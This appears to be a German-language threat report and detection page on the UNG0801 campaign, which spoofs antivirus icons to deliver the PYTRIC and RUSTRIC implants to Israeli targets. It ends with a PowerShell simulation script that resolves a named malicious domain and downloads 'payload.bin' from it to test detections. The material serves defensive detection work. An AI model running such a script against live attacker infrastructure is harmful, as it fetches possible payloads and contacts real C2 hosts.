UNG0801: Israel-gezielte Bedrohungsaktivität durch AV-Icon-Spoofing
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht skizziert zwei verbundene Kampagnen, die bösartige PDF- und Word-Dokumente nutzen, um Payloads bereitzustellen, die Antivirus-Symbole imitieren und auf israelische Organisationen abzielen. Eine Spur platziert PYTRIC, ein PyInstaller-verpacktes Python-Implantat, während die andere RUSTRIC bereitstellt, ein auf Rust basierendes Implantat, das über ein makrofähiges Word-Dokument gestartet wird. Beide Payloads sammeln Host-Details, führen Systembefehle aus und untersuchen installierte Sicherheitssoftware; PYTRIC enthält zusätzlich destruktive Funktionen. Die Zustellung erfolgt über Spear-Phishing-Anhänge und cloudbasierte Links (einschließlich Dropbox), wobei Telegram für die Steuerung und Kontrolle verwendet wird.
Untersuchung
SEQRITE Labs analysierte die anfänglichen Phishing-Köder, extrahierte eingebettete Makros und rekonstruierte die ausgelöste Payload-Kette. PYTRIC wurde als PyInstaller-Bundle mit Routinen zur Dateierkennung und Löschung bestätigt, und Analysten beobachteten Telegram-Bot-Anmeldedaten, die mit Backup2040 in Verbindung stehen. RUSTRIC wurde als Rust-Binärdatei profiliert, die nach achtundzwanzig Antivirusprodukten sucht und eine hex-kodierte Payload über WMI auslöst. Eine Infrastruktur-Analyse verband die Zustellung mit einem Dropbox-Link und einer Domain, die zu einer bereits mit netvigil.org.
Minderung
Schulen Sie Benutzer, unaufgefordert zugesandte PDF- und Word-Anhänge mit Vorsicht zu behandeln—insbesondere Dateien, die als Sicherheitstools oder mit Antiviren-Utilities präsentiert werden. Konfigurieren Sie E-Mail-Sicherheit so, dass Dokumente mit Makros blockiert werden und URLs, die auf Cloudspeicher-Hosts für die Payload-Zustellung verweisen, markiert oder eingeschränkt werden. Auf Endpunkten überwachen Sie die Ausführung von PyInstaller, ungewöhnliche WMI-Prozesserstellungen und verdächtige Aufrufe integrierter Dienstprogramme wie whoami, hostname und nslookup. Die Blockierung identifizierter bösartiger Domains und IPs kann den Infektionspfad weiter beeinträchtigen.
Reaktion
Wenn Aktivität erkannt wird, isolieren Sie das betroffene System, bewahren Sie flüchtige Daten auf und sammeln Sie die bösartigen Dokumente für eine hashbasierte Triage. Stoppen Sie verdächtige durch WMI gestartete Prozesse und entfernen Sie ausgelöste Payloads aus üblichen Speicherorten wie dem Downloads-Ordner. Führen Sie eine forensische Validierung auf Datei-Lösch- oder Wischaktivitäten durch, setzen Sie möglicherweise kompromittierte Anmeldedaten zurück und überwachen Sie nachfolgende Telegram-C2-Kommunikationen.
Angriffsablauf
Erkennungen
Möglicher Missbrauch von Telegram als Kommando- und Kontrollkanal (via dns_query)
Ansicht
Mögliche Dateninfiltration/-exfiltration/C2 über Drittanbieter-Dienste/Tools (via DNS)
Ansicht
Mögliche Systemaufzählung (über cmdline)
Ansicht
IOCs (SourceIP) zur Erkennung: UNG0801: Tracking von Bedrohungsclustern mit Antiviren-Symbol-Spoofing, die sich auf Israel konzentrieren
Ansicht
IOCs (DestinationIP) zur Erkennung: UNG0801: Tracking von Bedrohungsclustern mit Antiviren-Symbol-Spoofing, die sich auf Israel konzentrieren
Ansicht
IOCs (HashSha256) zur Erkennung: UNG0801: Tracking von Bedrohungsclustern mit Antiviren-Symbol-Spoofing, die sich auf Israel konzentrieren
Ansicht
C2-Kommunikation unter Verwendung spezifischer Domains und IP [Windows-Netzwerkverbindung]
Ansicht
Erkennung von bösartigen PDFs und Implantatausführungen in Operation IconCat [Windows-Prozesserstellung]
Ansicht
Simulationsausführung
Voraussetzung: Die Telemetrie- und Basislinien-Abflugkontrolle muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und sollen genau die Telemetriedaten erzeugen, die von der Erkennung erwartet werden. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle:
Der Gegner hat die Domain vorregistriert stratioai.org und sie so konfiguriert, dass sie auf 159.198.68.25 (ein kompromittierter VPS) auflöst. Mit einem PowerShell-One-Liner initiieren sie ein C2-Signal, das eine kleine Payload herunterlädt und dann eine persistente Rückwärtsshell beibehält. Die ausgehende Verbindung erfolgt über HTTPS (Port 443), um sich mit normalem Datenverkehr zu vermischen, aber die Firewall protokolliert die Ziel-IP und die DNS-Abfrage, was die Sigma-Regel erfüllt. -
Regressionstest-Skript:
# ------------------------------------------------- # Simuliertes C2-Signal zur Validierung der Erkennung # ------------------------------------------------- # 1. Löse die bösartige Domain (erzwingt DNS-Abfrage) $maliciousDomain = "stratioai.org" $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain) Write-Host "Aufgelöst $maliciousDomain zu $($resolved -join ', ')" # 2. Stelle HTTPS-Verbindung zur bösartigen IP her (C2) $maliciousIP = "159.198.68.25" $url = "https://$maliciousDomain/payload.bin" try { $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10 Write-Host "C2-Anfrage erfolgreich, Größe: $($response.ContentLength) Bytes" } catch { Write-Error "C2-Anfrage fehlgeschlagen: $_" } # 3. OPTIONAL: Halte den Kanal 30 Sekunden lang offen Start-Sleep -Seconds 30 # ------------------------------------------------- -
Aufräum-Befehle:
# Entferne alle temporären Dateien (in diesem Skript keine erstellt) # Leere den DNS-Cache, um eine versehentliche Wiederverwendung zu vermeiden ipconfig /flushdns Write-Host "Bereinigung abgeschlossen."